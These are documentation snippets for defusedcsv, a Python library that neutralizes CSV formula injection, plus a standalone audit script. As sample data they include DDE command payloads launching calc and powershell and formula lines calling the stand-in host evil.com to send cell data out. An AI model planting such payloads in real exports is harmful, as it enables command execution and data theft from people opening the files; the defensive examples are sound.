### Writing Sanitized CSV Rows with DefusedCSV

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Demonstrates how to use the library to write dictionary-based rows to a CSV. Malicious payloads starting with dangerous characters are automatically escaped so that a spreadsheet application does not execute them.

```python
from io import StringIO
from defusedcsv import csv

output = StringIO()
writer = csv.DictWriter(output, fieldnames=['username', 'email', 'bio'])
writer.writeheader()

writer.writerow({
    'username': 'alice',
    'email': 'alice@example.com',
    'bio': 'Software developer'
})
# The bio value starts with '=', so it is escaped on write
writer.writerow({
    'username': 'mallory',
    'email': 'mallory@example.com',
    'bio': '=cmd|\' /C calc\'!A0'
})
```

--------------------------------

### Write single rows with automatic escaping

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Uses the writerow method to write individual rows to a CSV. It automatically applies escaping to fields starting with dangerous characters while preserving valid numeric data.

```python
from io import StringIO
from defusedcsv import csv

output = StringIO()
writer = csv.writer(output)

# Safe data passes through unchanged
writer.writerow(['Product', 'Price', 'Quantity'])
writer.writerow(['Widget', '19.99', '100'])

# Dangerous payloads are automatically escaped
writer.writerow(['Gadget', '+1+1', '50'])
writer.writerow(['Tool', '|formula', '25'])
writer.writerow(['Part', '%macro', '75'])

# Numeric strings that look like formulas but are valid numbers are preserved
writer.writerow(['Item', '-19.99', '10'])

output.seek(0)
print(output.read())
```

--------------------------------

### Create CSV writer with defusedcsv

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Demonstrates initializing a CSV writer using defusedcsv.csv.writer, which acts as a secure replacement for the standard library, automatically sanitizing dangerous payloads like formula injections.
```python
from io import StringIO
from defusedcsv import csv

# Create a CSV writer with custom delimiter and quoting
output = StringIO()
writer = csv.writer(output, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)

# Write rows containing potentially dangerous payloads
writer.writerow(['Name', 'Email', 'Notes'])
writer.writerow(['Alice', 'alice@example.com', 'Regular user'])
writer.writerow(['Bob', 'bob@example.com', '=SUM(A1:A10)'])
# Double-quoted literals so the single quotes inside the payloads are valid Python
writer.writerow(['Charlie', 'charlie@example.com', "@SUM(1+1)*cmd|' /C calc'!A0"])
writer.writerow(['Dave', 'dave@example.com', "-2+3+cmd|' /C powershell'!A0"])

output.seek(0)
print(output.read())
```

--------------------------------

### Drop-in Replacement for Python CSV Module

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Shows the ease of integration by replacing the standard csv import. The library supports all standard features like DictReader, Sniffer, and dialect management while adding security.

```python
from defusedcsv import csv

with open('export.csv', 'w', newline='') as f:
    writer = csv.writer(f)
    writer.writerow(['Name', 'User Input'])
    writer.writerow(['User1', '=IMPORTXML("http://evil.com", "//a")'])
```

--------------------------------

### Write dictionary-based CSV with DictWriter

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Implements the DictWriter class to map dictionary keys to CSV headers, maintaining the standard interface while enforcing security sanitization on all values.

```python
from io import StringIO
from defusedcsv import csv

output = StringIO()
fieldnames = ['username', 'email', 'bio']
writer = csv.DictWriter(output, fieldnames=fieldnames)

# Write header row
writer.writeheader()
```

--------------------------------

### Replace standard csv module with defusedcsv

Source: https://github.com/raphaelm/defusedcsv/blob/master/README.rst

To use defusedcsv, replace the standard library import statement with the defusedcsv module.
This provides a drop-in replacement that automatically sanitizes CSV cell content to prevent injection attacks.

```python
from defusedcsv import csv

# Use the csv module as you normally would
with open('output.csv', 'w', newline='') as f:
    writer = csv.writer(f)
    writer.writerow(['=SUM(1+1)', 'normal data'])
```

--------------------------------

### Batch write rows with writerows

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Efficiently writes multiple rows at once using writerows, ensuring all fields across the dataset are sanitized against injection attacks.

```python
from io import StringIO
from defusedcsv import csv

output = StringIO()
writer = csv.writer(output)

# Batch write multiple rows with mixed safe and dangerous content
rows = [
    ['ID', 'Formula', 'Description'],
    [1, '=1+1', 'Addition formula'],
    [2, '-1+1', 'Subtraction attempt'],
    [3, '@A3', 'Cell reference'],
    [4, '=HYPERLINK("http://evil.com?data="&A1,"Click here")', 'Data exfiltration attempt'],
    [5, 'Safe content', 'No escaping needed']
]
writer.writerows(rows)

output.seek(0)
print(output.read())
```

--------------------------------

### Manual Sanitization with _escape

Source: https://context7.com/raphaelm/defusedcsv/llms.txt

Utilizes the internal _escape function to sanitize specific strings. It preserves safe data types like numbers and booleans while prefixing values that start with a dangerous character with a single quote.

```python
from defusedcsv.csv import _escape

print(_escape("=1+1"))                # '=1+1
print(_escape("@A3"))                 # '@A3
print(_escape("=cmd|' /C calc'!A0"))  # '=cmd\|' /C calc'!A0
```
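An added example, not part of defusedcsv or the snippets above: a standard-library audit that re-reads a CSV export and reports every cell a spreadsheet could still evaluate, which can serve as a regression test for export code. The names `is_formula_cell`, `neutralize`, `audit_csv` and `export` are hypothetical, `neutralize` is a stand-in that mirrors the escaping shown in the snippets, and the plain-number pattern is an assumption.

```python
import csv
import io
import re

# Leading characters the snippets above treat as dangerous.
TRIGGERS = ("=", "+", "-", "@", "|", "%")
# Assumption: a plain number is an optional minus sign, then digits, commas, dots.
PLAIN_NUMBER = re.compile(r"^-?[0-9,.]+$")

def is_formula_cell(value):
    """True if a spreadsheet may evaluate this cell instead of displaying it."""
    return value.startswith(TRIGGERS) and not PLAIN_NUMBER.match(value)

def neutralize(value):
    """Hypothetical stand-in for the escaping above: escape pipes, prefix a quote."""
    if isinstance(value, str) and is_formula_cell(value):
        return "'" + value.replace("|", "\\|")
    return value

def audit_csv(text):
    """Return (row, column, value) for every cell that still looks like a formula."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
    return findings

def export(rows, sanitize):
    """Write rows with the standard csv module, optionally neutralizing each cell."""
    out = io.StringIO()
    writer = csv.writer(out)
    for row in rows:
        writer.writerow([neutralize(v) if sanitize else v for v in row])
    return out.getvalue()

# Constructed sample rows that reuse payloads from the snippets above.
ROWS = [
    ["Product", "Price", "Notes"],
    ["Widget", "-19.99", "Regular item"],
    ["Gadget", "+1+1", "=SUM(A1:A10)"],
    ["Tool", "|formula", "@A3"],
]

if __name__ == "__main__":
    for label, sanitize in (("raw", False), ("neutralized", True)):
        print(label, audit_csv(export(ROWS, sanitize)))
```

The raw export yields four findings while the neutralized one yields none, and `-19.99` is never flagged because it is a valid number.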